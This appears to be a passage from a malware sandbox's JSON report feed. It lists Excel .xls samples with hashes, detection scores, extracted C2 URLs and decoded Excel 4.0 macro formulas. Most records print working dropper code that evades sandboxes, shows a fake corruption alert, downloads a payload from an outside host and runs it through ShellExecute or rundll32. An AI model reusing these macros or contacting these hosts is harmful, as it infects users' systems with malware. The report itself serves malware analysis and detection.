corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"UQ62kNqL1c\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9ebc45aff0e03d8f1eebb02aafc51a8c1a10e68313a5a9d05bee78346f39f567"},"analysis":{"reported":"2020-04-09T16:18:00Z","score":10},"files":[{"filename":"9ebc45aff0e03d8f1eebb02aafc51a8c1a10e68313a5a9d05bee78346f39f567","filesize":209408,"md5":"4099c84ec5dd8cf6cd26d365d4889491","sha1":"dc61a39e5e7f42164425fd648af93b04a10de0ff","sha256":"9ebc45aff0e03d8f1eebb02aafc51a8c1a10e68313a5a9d05bee78346f39f567","sha512":"5c6306fc07a67db137019ee64ba9a823cae567d86668a9058189e834b82f384559aaba1b9961eb1a69e77b3ab3ba4d2b6b87d18a62b95731461b77b6146dc3d5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9ebc45aff0e03d8f1eebb02aafc51a8c1a10e68313a5a9d05bee78346f39f567.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"DiRsre0brK\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9ed4826f559cc6518c12968e452ee95043a4fb7babdcb5792a170b4e312f8ed1"},"analysis":{"reported":"2020-04-09T16:18:00Z","score":10},"files":[{"filename":"9ed4826f559cc6518c12968e452ee95043a4fb7babdcb5792a170b4e312f8ed1","filesize":168448,"md5":"25846db2423680503ea570613c81c83b","sha1":"25cfbfdd8b06a1ca3e3b7504a2f1029c3732f1df","sha256":"9ed4826f559cc6518c12968e452ee95043a4fb7babdcb5792a170b4e312f8ed1","sha512":"68f11ad0f38458eb0db5fdc9cd597570226cded8a909c9c69f9835445919ccfa2433de97488157031c95a719c5c44dbee5099a98b45230b212f21cddaa71fc36","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9ed4826f559cc6518c12968e452ee95043a4fb7babdcb5792a170b4e312f8ed1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"l1STY2LiBF\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9edfb2e578a6ff1310424a7d34c07a9b6f381fc064905ea2a6002e5b1781d87d"},"analysis":{"reported":"2020-04-09T16:18:00Z","score":10},"files":[{"filename":"9edfb2e578a6ff1310424a7d34c07a9b6f381fc064905ea2a6002e5b1781d87d","filesize":168960,"md5":"7c80e5a4300cc7a61cb61733dfe44af2","sha1":"6870f0c4c0b310d7e986d52ef6a1180736d368f9","sha256":"9edfb2e578a6ff1310424a7d34c07a9b6f381fc064905ea2a6002e5b1781d87d","sha512":"1757b80be7594d0c6e9f377dcee15ce2f7bb39c07280887f5c3f0e549b1e142563d01558494174cd52a234a8b836f49cd6e15846f8d2cfba14b93af7c11db42b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9edfb2e578a6ff1310424a7d34c07a9b6f381fc064905ea2a6002e5b1781d87d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xnDt8PBn1F\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9ee15de1c6b834c295306b13dcf3058443ccb3b6a075c5b367cbd87e3313444b"},"analysis":{"reported":"2020-04-09T16:18:00Z","score":10},"files":[{"filename":"9ee15de1c6b834c295306b13dcf3058443ccb3b6a075c5b367cbd87e3313444b","filesize":185344,"md5":"3a606483e917bd20ab65c1eca656409b","sha1":"7e33399616bc2c82f76bdd8590cd6118bf13df65","sha256":"9ee15de1c6b834c295306b13dcf3058443ccb3b6a075c5b367cbd87e3313444b","sha512":"ba8db247d960dc3b62d2ff37fe9dce07c41f693d3cd92bfb726209550c61b42dd27d7660c73ac6096990e9cf353a7767ebbc0b592a226ba49ebab58a1b740c88","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9ee15de1c6b834c295306b13dcf3058443ccb3b6a075c5b367cbd87e3313444b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9ee81941da526805e0226e4e057caca5b997c7cdf0113437b31ab3a55f85a74b"},"analysis":{"reported":"2020-04-09T16:18:01Z","score":10},"files":[{"filename":"9ee81941da526805e0226e4e057caca5b997c7cdf0113437b31ab3a55f85a74b","filesize":160768,"md5":"5477aa694de4085f60c1b53d38e60554","sha1":"14a59c9ee516345f04e075dab51b14168aad96f1","sha256":"9ee81941da526805e0226e4e057caca5b997c7cdf0113437b31ab3a55f85a74b","sha512":"3f7750fb751d3ae72d1f4891fbae6824f6ab1aed66248675eb143af89002e9d3e66a420d6a9ec2cb2525533b8f10e1468ef21540844310b3bb0a4b6f1ce9278f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9ee81941da526805e0226e4e057caca5b997c7cdf0113437b31ab3a55f85a74b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VR9YsTKdLT\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9eeeb2f395c0a04efcdc83b4f278cb512631688344dba1821bb0e9cabf6e3b17"},"analysis":{"reported":"2020-04-09T16:18:01Z","score":10},"files":[{"filename":"9eeeb2f395c0a04efcdc83b4f278cb512631688344dba1821bb0e9cabf6e3b17","filesize":185344,"md5":"f6af5b23d0624dc2c9c974981f1bf0d6","sha1":"fb447c124b2658e4a49f3c85e6514949627352fb","sha256":"9eeeb2f395c0a04efcdc83b4f278cb512631688344dba1821bb0e9cabf6e3b17","sha512":"cb8886a4ecce76f5188486966cde651302480a1be9911e758574a984d95570d3a184f10c5ee3729f561fceb9bcf6c320783f88028b3db65b76bf44b6b8a0c6df","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9eeeb2f395c0a04efcdc83b4f278cb512631688344dba1821bb0e9cabf6e3b17.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9ef8631578196747fe6198a97c0ceb20"},"analysis":{"reported":"2020-04-09T16:18:01Z","score":10},"files":[{"filename":"9ef8631578196747fe6198a97c0ceb20","filesize":73728,"md5":"9ef8631578196747fe6198a97c0ceb20","sha1":"5eebe8e0a1c50e54391618b83a917e7f32b18bf8","sha256":"5a21120c9bd779786888f9d4d2a138836e627f001dbacc80c2b035ff7d198715","sha512":"04c7c0ecf6ad26546155218886188d5fc444c2067f9f28246094ad15fb5e4f1b0026fbc220ca18a2f34ba6f7629d371487b7dacfdbd6e4955fa64009e012a62f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9ef8631578196747fe6198a97c0ceb20.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fikima.com/axel.ex"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\LJDVSoL\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\LJDVSoL\\jolwzPk\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fikima.com/axel.ex\",\"C:\\LJDVSoL\\jolwzPk\\luFzdsM.exe\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"C:\\LJDVSoL\\jolwzPk\\luFzdsM.exe\",,0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9f2cb08f7a12390ca9e2ce4bb6b40c74f68dc149d6510d0eda3fb6931a2405bf"},"analysis":{"reported":"2020-04-09T16:18:01Z","score":10},"files":[{"filename":"9f2cb08f7a12390ca9e2ce4bb6b40c74f68dc149d6510d0eda3fb6931a2405bf","filesize":160768,"md5":"1eb8a45221218a9d7480acf13780d488","sha1":"19b32bbfa756d7dd3c8c510b0426287e10fd08d5","sha256":"9f2cb08f7a12390ca9e2ce4bb6b40c74f68dc149d6510d0eda3fb6931a2405bf","sha512":"112b3f7db9b0615a9c9b5bcf519b3cef35476ea34c7ef31f232029a35bd299a206373aacfda08112947d67ce65a1e982a6992e5c29b1104f327b6091f9901209","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9f2cb08f7a12390ca9e2ce4bb6b40c74f68dc149d6510d0eda3fb6931a2405bf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bnBBXTskCn\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9f483d9b5ca1e73fc72b969786117165b0dca622ca94ebf8cc07d32bf689283b"},"analysis":{"reported":"2020-04-09T16:18:01Z","score":10},"files":[{"filename":"9f483d9b5ca1e73fc72b969786117165b0dca622ca94ebf8cc07d32bf689283b","filesize":112128,"md5":"c0e72f6daecf886b3c6aa20a6be28431","sha1":"b77b83fc0d3bd2dc1c289507d35c8d11c44ceee1","sha256":"9f483d9b5ca1e73fc72b969786117165b0dca622ca94ebf8cc07d32bf689283b","sha512":"0157fb2919152a672e661f178f00a0c6eb94a09b78775b2cbbd9958dec5ce0a74c9ecdec522848e34a3b96d023d8c23ecd5d9051c87f9d90a9463558386e5b89","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9f483d9b5ca1e73fc72b969786117165b0dca622ca94ebf8cc07d32bf689283b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9f621c0838803910b5a4a0cf8a65817f3deecfb5bda4802dbacf89ccd6cca6a0"},"analysis":{"reported":"2020-04-09T16:18:01Z","score":10},"files":[{"filename":"9f621c0838803910b5a4a0cf8a65817f3deecfb5bda4802dbacf89ccd6cca6a0","filesize":141824,"md5":"72ed806a46203ce103245f6f3c6c91b4","sha1":"7f288c86b6227062c479a4e287d25e10d8cef5c0","sha256":"9f621c0838803910b5a4a0cf8a65817f3deecfb5bda4802dbacf89ccd6cca6a0","sha512":"885b3e70a971ade0d2faf78235477fe764543d362ee9f118b7511f27c8d6d0c8e1b1945eac91b99a77a80b89d6a575217a98ba08051b4b4b2eee21bc5645bba8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9f621c0838803910b5a4a0cf8a65817f3deecfb5bda4802dbacf89ccd6cca6a0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"2KQ4Pr4zUy\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9f777c8087e605e31b8f095c3a99da4277a124396c955845ba4d878e78d29b57"},"analysis":{"reported":"2020-04-09T16:18:01Z","score":10},"files":[{"filename":"9f777c8087e605e31b8f095c3a99da4277a124396c955845ba4d878e78d29b57","filesize":167936,"md5":"fe9c535923bebb7e1e502451893e0573","sha1":"e709d31f7b9316d735efc407aa8d6e1fb3b4466d","sha256":"9f777c8087e605e31b8f095c3a99da4277a124396c955845ba4d878e78d29b57","sha512":"062734509448f42261e417f26e45ae4f888f86d06dc6ab30ec7d51eaace4b4dbb81714e61851891ec05614c9b842f42a3c796d9c5634f1cd3b114a6efc86ae07","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9f777c8087e605e31b8f095c3a99da4277a124396c955845ba4d878e78d29b57.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xXhYqkps3G\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9f8345348456be3ac2f900990b69e2bc1006bbcdbfada37e9c751461c1744eeb"},"analysis":{"reported":"2020-04-09T16:18:01Z","score":10},"files":[{"filename":"9f8345348456be3ac2f900990b69e2bc1006bbcdbfada37e9c751461c1744eeb","filesize":185344,"md5":"f5d86fa2028927ebc2a12b17e40d3799","sha1":"06bb13972cf710343992e4589cef7625829d43f5","sha256":"9f8345348456be3ac2f900990b69e2bc1006bbcdbfada37e9c751461c1744eeb","sha512":"521801a74de35dfc928f7c92b8ee5e785e97d941a2f46b5c1fdf52901fd5e326695886d31840a97e38db6ed67c007b1b01909493878417420b15508c36f46211","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9f8345348456be3ac2f900990b69e2bc1006bbcdbfada37e9c751461c1744eeb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9f88038f5389483ec9818e53c2a1d06921296019e9ab424ccdbfd64d908ade58"},"analysis":{"reported":"2020-04-09T16:18:01Z","score":10},"files":[{"filename":"9f88038f5389483ec9818e53c2a1d06921296019e9ab424ccdbfd64d908ade58","filesize":209920,"md5":"a630879b26be870ce279e9197d01072f","sha1":"213e6cd9664af681c59e54711b82a41a0464d239","sha256":"9f88038f5389483ec9818e53c2a1d06921296019e9ab424ccdbfd64d908ade58","sha512":"d6ea743ac64b9b2f0505b01dbb359f11ab05e123cde0988c2099789c7093b22c71743c1c5bb6e68f6d3550959a41212897e862ee6afe8fa121c2e6f21fa68312","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9f88038f5389483ec9818e53c2a1d06921296019e9ab424ccdbfd64d908ade58.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"o0KFigBUFf\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9fa804c5ffc22e787bda1b1c6c32860fba32ae23ddb468082d59e80028bd244e"},"analysis":{"reported":"2020-04-09T16:18:01Z","score":10},"files":[{"filename":"9fa804c5ffc22e787bda1b1c6c32860fba32ae23ddb468082d59e80028bd244e","filesize":167936,"md5":"9b630b9f5b3cf62a4ae5d0dc58aa66a5","sha1":"4ffb0356080f571137c9120d9837f897e30e1d55","sha256":"9fa804c5ffc22e787bda1b1c6c32860fba32ae23ddb468082d59e80028bd244e","sha512":"03b75cc99974e0d4dc1e4f94886775316a94c5d36dec47a2a4f3c93c6f2e090df1d095cea1f9d68596706c19932fc336dde50f6059cf575ba6570ec4786fb5c6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9fa804c5ffc22e787bda1b1c6c32860fba32ae23ddb468082d59e80028bd244e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5Zxofm91tB\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9fabfdf84da07b048a3e36b1925ad8ea5a4fa826f9af23a05ab1bcc576406502"},"analysis":{"reported":"2020-04-09T16:18:02Z","score":10},"files":[{"filename":"9fabfdf84da07b048a3e36b1925ad8ea5a4fa826f9af23a05ab1bcc576406502","filesize":209920,"md5":"1947bbe0b009c7df599f65439933bb16","sha1":"2f495650cab923d518c856be76397961b2266903","sha256":"9fabfdf84da07b048a3e36b1925ad8ea5a4fa826f9af23a05ab1bcc576406502","sha512":"ead749008c7cc4b7f6dc35258e104b65832030764ee14e0d4dd060fbef7885943fc475463859e95fff1de7ff6cd25c3e87733c889a57e79c32a7b52a37a9a5bf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9fabfdf84da07b048a3e36b1925ad8ea5a4fa826f9af23a05ab1bcc576406502.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"PmaTUnU4qD\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9fac60b8e0f538d417d600eb8c87f2dbe36f64b50a383476d7420c290ecdff18"},"analysis":{"reported":"2020-04-09T16:18:02Z","score":10},"files":[{"filename":"9fac60b8e0f538d417d600eb8c87f2dbe36f64b50a383476d7420c290ecdff18","filesize":206336,"md5":"9dbbbad5ef0a6ecd72a77581833d0215","sha1":"6625c775e64ceea3bb996bdea2c2b17962e034df","sha256":"9fac60b8e0f538d417d600eb8c87f2dbe36f64b50a383476d7420c290ecdff18","sha512":"1329bd53641a9e4b5a7ae89787163b6191409bb6a752dd79c1a26ebecd890bf39004df7c92a80c50142b30f9f0b999885e0a93626a2ad2d042c1d0d5683579e0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9fac60b8e0f538d417d600eb8c87f2dbe36f64b50a383476d7420c290ecdff18.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM 